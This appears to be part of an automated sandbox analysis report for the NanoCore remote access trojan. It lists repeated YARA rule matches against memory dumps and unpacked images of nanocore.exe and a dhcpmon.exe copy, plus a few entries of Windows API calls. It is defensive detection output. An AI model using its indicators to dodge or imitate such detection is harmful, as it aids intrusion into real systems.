      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.5820000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.233ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.245ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.252b8c4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040314A
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,8_2_0040314A
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 1_2_004046A71_2_004046A7
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_0040A2A52_2_0040A2A5
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_022CE4712_2_022CE471
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_022CE4802_2_022CE480
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_022CBBD42_2_022CBBD4
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_051CF5F82_2_051CF5F8
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 2_2_051C97882_2_051C9788
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 8_2_004046A78_2_004046A7
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_0040A2A510_2_0040A2A5
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_022DE47110_2_022DE471
      Source: C:\Users\user\Desktop\nanocore.exeCode function: 10_2_022DE48010_2_022DE480
